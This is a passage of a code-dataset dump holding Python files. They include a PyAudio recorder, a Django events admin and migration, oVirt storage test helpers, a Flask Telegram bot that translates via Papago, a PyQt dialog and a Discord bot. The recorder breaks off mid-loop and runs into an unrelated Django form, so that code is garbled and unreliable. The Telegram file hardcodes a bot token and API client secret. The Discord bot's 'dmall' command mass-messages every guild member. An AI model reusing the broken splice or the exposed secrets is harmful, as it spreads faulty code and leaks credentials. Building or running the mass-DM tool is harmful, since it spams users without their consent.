"usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 399, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 407, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 431, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 431, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 443, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 445, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 451, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 459, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.list_files", "line_number": 551, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 551, "usage_type": "attribute"}, {"api_name": "tensorflow.data.TextLineDataset", "line_number": 554, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 554, "usage_type": "attribute"}, {"api_name": "tensorflow.py_func", "line_number": 554, "usage_type": "call"}, {"api_name": "tensorflow.double", "line_number": 554, "usage_type": "attribute"}, {"api_name": "tensorflow.bool", "line_number": 554, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 555, "usage_type": "call"}, {"api_name": "helper2_bev.maybe_download_pretrained_vgg", "line_number": 590, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 627, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 627, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 631, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 633, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 633, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 633, 
"usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 649, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 649, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 650, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 650, "usage_type": "attribute"}, {"api_name": "helper2_bev.save_inference_samples", "line_number": 664, "usage_type": "call"}]} {"seq_id": "623757362", "text": "import wave\r\nfrom pyaudio import PyAudio,paInt16\r\n\r\n# 录制的音频质量参数\r\nframerate=16000\r\nNUM_SAMPLES=2000\r\nchannels=1\r\nsampwidth=2\r\nTIME=16 #单位为s,实际录音时间会缩小两倍\r\n\r\n# 录音函数\r\ndef save_wave_file(param, my_buf):\r\n pass\r\n\r\n\r\ndef start():\r\n pa=PyAudio()\r\n stream=pa.open(format = paInt16,channels=1,\r\n rate=framerate,input=True,\r\n frames_per_buffer=NUM_SAMPLES)\r\n my_buf=[]\r\n count=0\r\n while count price_till:\n self.cleaned_data.update({\n 'price_from': price_till,\n 'price_till': price_from,\n })\n\n return self.cleaned_data\n\n class Meta:\n widgets = {\n 'title': AutocompleteWidget(model=Event),\n 'main_image': AjaxChosenWidget(),\n }\n\n\nclass BulkSessionForm(forms.ModelForm):\n date_start = forms.DateField(\n label=u'Начальная дата',\n required=True,\n widget=DateWidget(\n usel10n=True,\n attrs={},\n options={'todayBtn': 'true', 'todayHighlight': 'true'}\n ),\n )\n date_end = forms.DateField(\n label=u'Конечная дата',\n required=True,\n widget=DateWidget(\n usel10n=True,\n attrs={},\n options={'todayBtn': 'true', 'todayHighlight': 'true'}\n ),\n )\n days = forms.MultipleChoiceField(\n choices=WEEK_DAYS,\n label=u'Дни недели',\n required=True,\n widget=forms.CheckboxSelectMultiple,\n )\n\n def clean(self):\n def get_working_days(date_start_obj, date_end_obj, days):\n from dateutil import rrule\n if days:\n weekdays = rrule.rrule(\n rrule.DAILY,\n byweekday=days,\n dtstart=date_start_obj,\n until=date_end_obj\n )\n else:\n weekdays = []\n return list(weekdays)\n\n self.cleaned_data = forms.ModelForm.clean(self)\n\n date_start = self.cleaned_data.get('date_start')\n date_end = self.cleaned_data.get('date_end')\n\n if date_start and date_end and date_end < date_start:\n self.cleaned_data.update({\n 'date_start': date_end,\n 'date_end': date_start,\n })\n\n self.days_list = get_working_days(\n self.cleaned_data.get('date_start'),\n self.cleaned_data.get('date_end'),\n map(int, self.cleaned_data.get('days', []))\n )\n\n if not self.days_list:\n raise ValidationError({\n 'days': u'Пожалуйста выберите дни недели, которые '\n u'попадают между выбранными датами.'\n })\n\n return self.cleaned_data\n\n def save(self, commit=True, formset=None, times_start=None, time_end=None):\n instances = []\n times = filter(\n None, set([i.get('time_start') for i in formset.cleaned_data])\n )\n times = times_start or times\n for day in self.days_list:\n for time_start in times:\n inst, create = Session.objects.get_or_create(\n event_place=self.instance,\n date_start=day,\n time_start=time_start,\n defaults={'time_end': time_end}\n )\n if create:\n instances.append(inst)\n return instances\n\n class Meta:\n exclude = tuple()\n model = EventPlace\n\n def get_fieldsets(self):\n return [(None, {'fields': [i.name for i in self.visible_fields()]})]\n\n class Media:\n js = (\n staticfiles_storage.url(\n 'admin/js/admin/sessions.formset.datepicker.js'\n ),\n )\n\n\n# inlines\n\nclass EventInline(ReadonlyInline):\n model = Event\n fields = (\n 'title',\n 'places_display',\n 'date_start',\n 'date_end',\n 'rate',\n )\n 
readonly_fields = (\n 'title',\n 'places_display',\n 'date_start',\n 'date_end',\n 'rate',\n )\n\n\nclass SessionInline(admin.TabularInline):\n form = SessionForm\n model = Session\n extra = 1\n exclude = ('id', )\n\n\nclass StartTimeSessionInline(SessionInline):\n exclude = ('id', 'date_start')\n extra = 1\n\n\nclass EventPlaceInline(admin.TabularInline):\n model = EventPlace\n extra = 1\n fields = ('place', 'schedule_btn')\n readonly_fields = ('schedule_btn', )\n formfield_overrides = {\n models.ForeignKey: {'widget': AjaxChosenWidget}\n }\n\n\n# admins\n\nclass EventPlaceAdmin(reversion.VersionAdmin):\n inlines = (SessionInline, )\n list_display = (\n 'modified',\n 'event_title',\n 'place_title',\n )\n search_fields = ('event__title', 'place__title')\n readonly_fields = ('event', 'place')\n formfield_overrides = {\n models.ForeignKey: {'widget': AjaxChosenWidget},\n }\n\n def change_view(self, request, object_id, form_url='', extra_context=None):\n extra_context = {\n 'has_bulk_session_view': hasattr(self, 'bulk_session_view'),\n }\n return super(EventPlaceAdmin, self).change_view(\n request, object_id, form_url='', extra_context=extra_context\n )\n\n def has_add_permission(self, request):\n return False\n\n @method_decorator(csrf_protect)\n @transaction.atomic\n def bulk_session_view(self, request, object_id, extra_context=None):\n model = self.model\n opts = model._meta\n bulk_session_inlines = [StartTimeSessionInline]\n\n obj = self.get_object(request, unquote(object_id))\n if not self.has_change_permission(request, obj):\n raise PermissionDenied\n if obj is None:\n raise Http404(\n _('{name} object with primary key {key} does not exist.')\n .format(\n name=force_text(opts.verbose_name),\n key=escape(object_id),\n )\n )\n\n ModelForm = BulkSessionForm\n if request.method == 'POST':\n data = request.POST\n data['place'] = obj.place.pk\n data['event'] = obj.event.pk\n form = ModelForm(data, request.FILES, instance=obj)\n form_validated = True if form.is_valid() else False\n new_object = form.instance\n\n with tools.replace_obj_var(self, 'inlines', bulk_session_inlines):\n formsets, inline_instances = self._create_formsets(\n request, new_object, change=True\n )\n if all_valid(formsets) and form_validated:\n new_objects = form.save(formset=formsets[0])\n redirect_url = reverse('admin:{0}_{1}_change'.format(\n opts.app_label, opts.model_name),\n current_app=self.admin_site.name,\n args=[new_object.pk])\n return self.response_bulk_session(\n request, redirect_url, new_objects\n )\n else:\n form = ModelForm(instance=obj)\n with tools.replace_obj_var(self, 'inlines', bulk_session_inlines):\n formsets, inline_instances = self._create_formsets(\n request, None, change=False\n )\n\n adminForm = helpers.AdminForm(\n form,\n list(form.get_fieldsets()),\n self.get_prepopulated_fields(request, obj),\n self.get_readonly_fields(request, obj),\n model_admin=self)\n media = self.media + adminForm.media\n\n inline_formsets = self.get_inline_formsets(\n request, formsets, inline_instances, obj\n )\n\n for inline_formset in inline_formsets:\n media = media + inline_formset.media\n\n context = dict(\n site_title=self.admin_site.site_title,\n site_header=self.admin_site.site_header,\n title=_(u'Добавить несколько сеансов'),\n adminform=adminForm,\n object_id=object_id,\n original=obj,\n media=media,\n inline_admin_formsets=inline_formsets,\n errors=helpers.AdminErrorList(form, formsets),\n preserved_filters=self.get_preserved_filters(request),\n )\n\n context.update(extra_context or {})\n\n form_url = ''\n 
new_template = 'admin/{0}/{1}/bulk_session.html'.format(\n            opts.app_label, opts.model_name)\n        with tools.replace_obj_var(self, 'change_form_template', new_template):\n            result = self.render_change_form(\n                request, context,\n                add=False,\n                change=True,\n                obj=obj,\n                form_url=form_url\n            )\n        return result\n\n    def response_bulk_session(self, request, redirect_url, instances):\n        if instances:\n            sessions_msg = u'<br>    {0}<br>'.format(u''.join(\n                [u'<br>  • Дата: {0} Время начала: {1}<br>  • '\n                .format(i.date_start.date(), i.time_start)\n                for i in instances]))\n            msg = u'Успешно добавленные сеансы ({0}):<br>
    {1}'\\\n .format(len(instances), sessions_msg)\n else:\n msg = _(u'Сеансы не были добавлены.')\n self.message_user(request, mark_safe(msg), messages.SUCCESS)\n return HttpResponseRedirect(redirect_url)\n\n def get_urls(self):\n from django.conf.urls import url\n urlpatterns = list(super(EventPlaceAdmin, self).get_urls())\n urlpatterns.insert(-1, url(r'^(.+)/bulk_session/$',\n self.bulk_session_view,\n name='admin_bulk_session'))\n return urlpatterns\n\n def event_title(self, obj):\n return obj.event.title\n event_title.allow_tags = True\n event_title.admin_order_field = 'event__title'\n event_title.short_description = _(u'Событие')\n\n def place_title(self, obj):\n return obj.place.title\n place_title.allow_tags = True\n place_title.admin_order_field = 'place__title'\n place_title.short_description = _(u'Место')\n\n\nclass EventAdmin(\n EventPlaceMergeAdminMixin,\n ContentAdminMixin,\n AddUserMixin,\n reversion.VersionAdmin\n):\n form = EventForm\n fieldsets = EventForm.get_fieldsets()\n list_display = (\n 'title',\n 'date_start',\n 'date_end',\n 'main_tag',\n 'tags_display',\n 'source_info_display',\n 'created',\n 'modified',\n 'pub_date',\n 'status',\n 'content_actions',\n )\n inlines = (\n GalleryInline,\n SeoInline,\n PaymentInline,\n EventPlaceInline,\n ContentPropertyInline,\n )\n\n\nadmin.site.register(Event, EventAdmin)\nadmin.site.register(EventPlace, EventPlaceAdmin)\n", "sub_path": "src/admin_app/events/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 14448, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.forms.ModelForm", "line_number": 57, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 57, "usage_type": "name"}, {"api_name": "datetimewidget.widgets.DateWidget", "line_number": 61, "usage_type": "call"}, {"api_name": "datetimewidget.widgets.TimeWidget", "line_number": 66, "usage_type": "call"}, {"api_name": "datetimewidget.widgets.TimeWidget", "line_number": 67, "usage_type": "call"}, {"api_name": "django.contrib.staticfiles.storage.staticfiles_storage.url", "line_number": 72, "usage_type": "call"}, {"api_name": "django.contrib.staticfiles.storage.staticfiles_storage", "line_number": 72, "usage_type": "name"}, {"api_name": "admin_app.core.forms.ContentModelForm", "line_number": 78, "usage_type": "name"}, {"api_name": "admin_app.core.utils.options.DEFAULT_FIELDSETS", "line_number": 93, "usage_type": "name"}, {"api_name": "admin_app.core.utils.options.DEFAULT_FIELDSETS", "line_number": 97, "usage_type": "name"}, {"api_name": "admin_app.core.utils.options.DEFAULT_FIELDSETS", "line_number": 101, "usage_type": "name"}, {"api_name": "admin_app.core.utils.options.DEFAULT_FIELDSETS", "line_number": 105, "usage_type": "name"}, {"api_name": "admin_app.core.utils.widgets.AutocompleteWidget", "line_number": 132, "usage_type": "call"}, {"api_name": "admin_app.events.models.Event", "line_number": 132, "usage_type": "name"}, {"api_name": "admin_app.core.utils.widgets.AjaxChosenWidget", "line_number": 133, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 137, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 137, "usage_type": "name"}, {"api_name": "django.forms.DateField", "line_number": 138, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 138, "usage_type": "name"}, {"api_name": "datetimewidget.widgets.DateWidget", "line_number": 141, "usage_type": "call"}, {"api_name": 
"django.forms.DateField", "line_number": 147, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 147, "usage_type": "name"}, {"api_name": "datetimewidget.widgets.DateWidget", "line_number": 150, "usage_type": "call"}, {"api_name": "django.forms.MultipleChoiceField", "line_number": 156, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 156, "usage_type": "name"}, {"api_name": "admin_app.core.utils.constants.WEEK_DAYS", "line_number": 157, "usage_type": "name"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 160, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 160, "usage_type": "name"}, {"api_name": "dateutil.rrule.rrule", "line_number": 167, "usage_type": "call"}, {"api_name": "dateutil.rrule", "line_number": 167, "usage_type": "name"}, {"api_name": "dateutil.rrule.DAILY", "line_number": 168, "usage_type": "attribute"}, {"api_name": "dateutil.rrule", "line_number": 168, "usage_type": "name"}, {"api_name": "django.forms.ModelForm.clean", "line_number": 177, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 177, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 177, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 195, "usage_type": "call"}, {"api_name": "admin_app.events.models.Session.objects.get_or_create", "line_number": 210, "usage_type": "call"}, {"api_name": "admin_app.events.models.Session.objects", "line_number": 210, "usage_type": "attribute"}, {"api_name": "admin_app.events.models.Session", "line_number": 210, "usage_type": "name"}, {"api_name": "admin_app.events.models.EventPlace", "line_number": 222, "usage_type": "name"}, {"api_name": "django.contrib.staticfiles.storage.staticfiles_storage.url", "line_number": 229, "usage_type": "call"}, {"api_name": "django.contrib.staticfiles.storage.staticfiles_storage", "line_number": 229, "usage_type": "name"}, {"api_name": "admin_app.core.utils.admin.ReadonlyInline", "line_number": 237, "usage_type": "name"}, {"api_name": "admin_app.events.models.Event", "line_number": 238, "usage_type": "name"}, {"api_name": "django.contrib.admin.TabularInline", "line_number": 255, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 255, "usage_type": "name"}, {"api_name": "admin_app.events.models.Session", "line_number": 257, "usage_type": "name"}, {"api_name": "django.contrib.admin.TabularInline", "line_number": 267, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 267, "usage_type": "name"}, {"api_name": "admin_app.events.models.EventPlace", "line_number": 268, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 273, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 273, "usage_type": "name"}, {"api_name": "admin_app.core.utils.widgets.AjaxChosenWidget", "line_number": 273, "usage_type": "name"}, {"api_name": "reversion.VersionAdmin", "line_number": 279, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 289, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 289, "usage_type": "name"}, {"api_name": "admin_app.core.utils.widgets.AjaxChosenWidget", "line_number": 289, "usage_type": "name"}, {"api_name": "django.contrib.admin.utils.unquote", "line_number": 310, "usage_type": "call"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 312, "usage_type": "name"}, {"api_name": 
"django.http.Http404", "line_number": 314, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 315, "usage_type": "call"}, {"api_name": "django.utils.encoding.force_text", "line_number": 317, "usage_type": "call"}, {"api_name": "django.utils.html.escape", "line_number": 318, "usage_type": "call"}, {"api_name": "admin_app.core.utils.tools.replace_obj_var", "line_number": 331, "usage_type": "call"}, {"api_name": "admin_app.core.utils.tools", "line_number": 331, "usage_type": "name"}, {"api_name": "django.forms.formsets.all_valid", "line_number": 335, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 337, "usage_type": "call"}, {"api_name": "admin_app.core.utils.tools.replace_obj_var", "line_number": 346, "usage_type": "call"}, {"api_name": "admin_app.core.utils.tools", "line_number": 346, "usage_type": "name"}, {"api_name": "django.contrib.admin.helpers.AdminForm", "line_number": 351, "usage_type": "call"}, {"api_name": "django.contrib.admin.helpers", "line_number": 351, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 369, "usage_type": "call"}, {"api_name": "django.contrib.admin.helpers.AdminErrorList", "line_number": 375, "usage_type": "call"}, {"api_name": "django.contrib.admin.helpers", "line_number": 375, "usage_type": "name"}, {"api_name": "admin_app.core.utils.tools.replace_obj_var", "line_number": 384, "usage_type": "call"}, {"api_name": "admin_app.core.utils.tools", "line_number": 384, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 303, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_protect", "line_number": 303, "usage_type": "argument"}, {"api_name": "django.db.transaction.atomic", "line_number": 304, "usage_type": "attribute"}, {"api_name": "django.db.transaction", "line_number": 304, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 403, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 404, "usage_type": "call"}, {"api_name": "django.contrib.messages.SUCCESS", "line_number": 404, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 404, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 405, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 410, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 419, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 425, "usage_type": "call"}, {"api_name": "admin_app.core.utils.admin.EventPlaceMergeAdminMixin", "line_number": 429, "usage_type": "name"}, {"api_name": "admin_app.core.utils.admin.ContentAdminMixin", "line_number": 430, "usage_type": "name"}, {"api_name": "admin_app.core.utils.admin.AddUserMixin", "line_number": 431, "usage_type": "name"}, {"api_name": "reversion.VersionAdmin", "line_number": 432, "usage_type": "attribute"}, {"api_name": "admin_app.core.admin.GalleryInline", "line_number": 450, "usage_type": "name"}, {"api_name": "common.seo.admin.SeoInline", "line_number": 451, "usage_type": "name"}, {"api_name": "admin_app.payments.admin.PaymentInline", "line_number": 452, "usage_type": "name"}, {"api_name": "admin_app.content_properties.admin.ContentPropertyInline", "line_number": 454, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 458, 
"usage_type": "call"}, {"api_name": "admin_app.events.models.Event", "line_number": 458, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 458, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 458, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 459, "usage_type": "call"}, {"api_name": "admin_app.events.models.EventPlace", "line_number": 459, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 459, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 459, "usage_type": "name"}]} {"seq_id": "148018864", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('fundraising', '0031_auto_20150604_0813'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='donation',\n old_name='amount',\n new_name='subscription_amount',\n ),\n migrations.AlterField(\n model_name='donation',\n name='subscription_amount',\n field=models.DecimalField(blank=True, null=True, decimal_places=2, max_digits=9),\n preserve_default=True,\n ),\n migrations.RemoveField(\n model_name='donation',\n name='stripe_charge_id',\n ),\n ]\n", "sub_path": "fundraising/migrations/0032_auto_20150604_0813.py", "file_name": "0032_auto_20150604_0813.py", "file_ext": "py", "file_size_in_byte": 767, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.RenameField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.migrations.RemoveField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 25, "usage_type": "name"}]} {"seq_id": "508532088", "text": "\"\"\"\nLive Storage Migration test helpers functions\n\"\"\"\nimport config\nfrom art.rhevm_api.tests_lib.low_level import (\n disks as ll_disks,\n)\nfrom rhevmtests.storage.helpers import prepare_disks_for_vm\n\n\ndef add_new_disk_for_test(\n vm_name, alias, provisioned_size=(1 * config.GB), sparse=False,\n disk_format=config.RAW_DISK, wipe_after_delete=False, attach=False,\n sd_name=None\n):\n \"\"\"\n Prepares disk for given vm\n \"\"\"\n disk_params = config.disk_args.copy()\n disk_params['alias'] = alias\n disk_params['active'] = False\n disk_params['provisioned_size'] = provisioned_size\n disk_params['format'] = disk_format\n disk_params['sparse'] = sparse\n disk_params['wipe_after_delete'] = wipe_after_delete\n disk_params['storagedomain'] = sd_name\n\n assert ll_disks.addDisk(True, **disk_params), (\n \"Failed to add disk %s\" % alias\n )\n ll_disks.wait_for_disks_status([alias])\n if attach:\n prepare_disks_for_vm(vm_name, [alias])\n", "sub_path": "art/tests/rhevmtests/storage/storage_migration/helpers.py", "file_name": "helpers.py", "file_ext": "py", 
"file_size_in_byte": 981, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "config.GB", "line_number": 12, "usage_type": "attribute"}, {"api_name": "config.RAW_DISK", "line_number": 13, "usage_type": "attribute"}, {"api_name": "config.disk_args.copy", "line_number": 19, "usage_type": "call"}, {"api_name": "config.disk_args", "line_number": 19, "usage_type": "attribute"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks.addDisk", "line_number": 28, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks", "line_number": 28, "usage_type": "name"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks.wait_for_disks_status", "line_number": 31, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks", "line_number": 31, "usage_type": "name"}, {"api_name": "rhevmtests.storage.helpers.prepare_disks_for_vm", "line_number": 33, "usage_type": "call"}]} {"seq_id": "314179730", "text": "from flask import Flask, render_template, request\nfrom pprint import pprint\nimport requests\n\napp = Flask(__name__)\n\n# 요청을 위한 기본 준비\ntoken = '805457410:AAGhgJeP4X79yj8TKWsrr_shUYbvjMWEZUo'\nchat_id = '749251074'\nnaver_client_id = 'bej3naFebiOt4saB3r0h'\nnaver_client_secret = '2u4UN7QruP'\n\napp_url = f'https://api.telegram.org/bot{token}'\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n@app.route('/write')\ndef write():\n return render_template('write.html')\n\n@app.route('/send')\ndef send():\n #1. 사용자가 보낸 메시지를 받아서 text 변수에 저장하자\n text = request.args.get('msg')\n\n #2. Telegram bot이 chat_id를 가진 사람에게 메시지를 보낸다.\n message_url = f'{app_url}/sendMessage?chat_id={chat_id}&text={text}'\n\n #3. 텔레그램 서버로 메시지 전송\n requests.get(message_url)\n\n return render_template('send.html')\n\n@app.route('/telegram', methods=['POST'])\ndef telegram():\n telegram_response = request.get_json()\n # pprint(telegram_response)\n # print(request)\n\n if telegram_response.get('message') is not None:\n chat_id = telegram_response.get('message').get('chat').get('id')\n text = telegram_response.get('message').get('text')\n # requests.get(f'{app_url}/sendMessage?chat_id={chat_id}&text={text}')\n\n if text[0:4] == '/번역 ':\n headers = {\n 'X-Naver-Client-Id': naver_client_id,\n 'X-Naver-Client-Secret': naver_client_secret\n }\n\n data = {\n 'source': 'ko',\n 'target': 'ja',\n 'text': text[4:]\n }\n\n papage_response = requests.post(\n 'https://openapi.naver.com/v1/papago/n2mt',\n headers=headers,\n data=data\n ).json()\n\n # pprint(papage_response)\n text = papage_response.get('message').get('result').get('translatedText')\n requests.get(f'{app_url}/sendMessage?chat_id={chat_id}&text={text}')\n return '', 200\n\n\nif __name__ == '__main__':\n app.run(debug=True)", "sub_path": "SSAFY/Python_lecture/lectures-justin-master/StartCamp/telegram_bot/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2115, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.render_template", 
"line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 59, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 67, "usage_type": "call"}]} {"seq_id": "321498311", "text": "from PyQt5.QtWidgets import QDialog, QTreeWidget, QTreeWidgetItem, QLineEdit, QVBoxLayout, QPushButton, QHBoxLayout, QStyle\n\nfrom utils.ViewUtils import FilterTreeBySearchText\n\nclass LogicSelectDialog(QDialog):\n def __init__(self, logicsModel):\n super().__init__()\n\n self._resultLogic = None\n self._currentSelection = None\n\n self._rootLayout = QVBoxLayout()\n\n self._searchLine = QLineEdit()\n self._searchLine.setPlaceholderText(\"Search...\")\n self._searchLine.setClearButtonEnabled(True)\n self._searchLine.textChanged.connect(self._signal_searchLine_textChanged)\n self._rootLayout.addWidget(self._searchLine)\n\n self._tree = QTreeWidget()\n self._tree.setHeaderHidden(True)\n self._tree.setColumnCount(1)\n self._tree.setSortingEnabled(False)\n self._tree.currentItemChanged.connect(self._signal_tree_currentItemChanged)\n self._buildTree(self._tree.invisibleRootItem(), logicsModel.getLogics())\n self._rootLayout.addWidget(self._tree)\n\n self._buttotLayout = QHBoxLayout()\n\n self._cancelBt = QPushButton(\"Cancel\")\n self._cancelBt.clicked.connect(self._signal_cancelBt_clicked)\n self._buttotLayout.addWidget(self._cancelBt)\n\n self._addBt = QPushButton(\"Add\")\n self._addBt.clicked.connect(self._signal_addBt_clicked)\n self._addBt.setEnabled(False)\n self._buttotLayout.addWidget(self._addBt)\n\n self._rootLayout.addLayout(self._buttotLayout)\n\n self.setLayout(self._rootLayout)\n self.setWindowTitle(\"Select Entity Logic\")\n\n def _buildTree(self, rootItem, moduleLogics):\n for module in moduleLogics:\n moduleItem = QTreeWidgetItem(rootItem)\n moduleItem.setText(0, module.getName())\n moduleItem.setIcon(0, self.style().standardIcon(QStyle.SP_DirIcon))\n for logic in module.getLogics():\n item = QTreeWidgetItem(moduleItem)\n item.setText(0, logic.getName())\n item._node = logic\n\n def _signal_cancelBt_clicked(self):\n self._resultLogic = None\n self.done(0)\n\n def _signal_addBt_clicked(self):\n self._resultLogic = self._currentSelection\n self.done(0)\n\n def _signal_searchLine_textChanged(self, text):\n FilterTreeBySearchText(self._tree, text)\n\n def getResultLogic(self):\n return self._resultLogic\n\n def _signal_tree_currentItemChanged(self, currItem, prevItem):\n if currItem is not None:\n if hasattr(currItem, \"_node\"):\n self._currentSelection = currItem._node\n self._addBt.setEnabled(True)\n return\n self._currentSelection = None\n self._addBt.setEnabled(False)", "sub_path": "Sources/Editor/App/dialog/LogicSelecDialog.py", "file_name": "LogicSelecDialog.py", "file_ext": "py", "file_size_in_byte": 2766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 5, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 12, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 14, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTreeWidget", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 28, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 30, "usage_type": 
"call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTreeWidgetItem", "line_number": 46, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QStyle.SP_DirIcon", "line_number": 48, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QStyle", "line_number": 48, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTreeWidgetItem", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.ViewUtils.FilterTreeBySearchText", "line_number": 63, "usage_type": "call"}]} {"seq_id": "346881562", "text": "import discord\nfrom discord.ext import commands\n\nclient = commands.Bot(command_prefix = 'r!')\n\n@client.event\nasync def on_ready():\n print('Ready!')\n \n\n@client.command()\nasync def dmall(ctx, global_guildid : int,*, message):\n master = [391425164123963394,600471112140324864]\n login_status = 0\n test = ctx.author.id\n for a in master:\n if test == a:\n login_status = login_status + 1\n if login_status == 1:\n guild = client.get_guild(int(global_guildid))\n msg = await ctx.channel.send('> 메시지 전송 작업이 시작되었습니다.')\n su = 0\n fa = 0\n sul = 0\n user = []\n for channelz in guild.members:\n print(channelz)\n user.append(channelz.name)\n print(user)\n for 